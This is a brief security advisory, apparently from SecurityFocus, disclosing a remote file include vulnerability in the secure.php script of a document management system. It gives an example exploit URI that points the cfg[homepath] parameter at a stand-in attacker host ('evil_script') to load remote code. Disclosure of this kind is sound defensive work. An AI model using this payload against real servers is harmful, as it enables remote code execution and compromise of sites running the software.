Uber Project Document Management System Secure.PHP Remote File Include Vulnerability

Attackers can exploit this issue via a web client.

The following example URI is available:

http://www.example.com/[script_path]/login/secure.php?cfg[homepath]=http://evil_script ?


 

Privacy Statement
Copyright 2010, SecurityFocus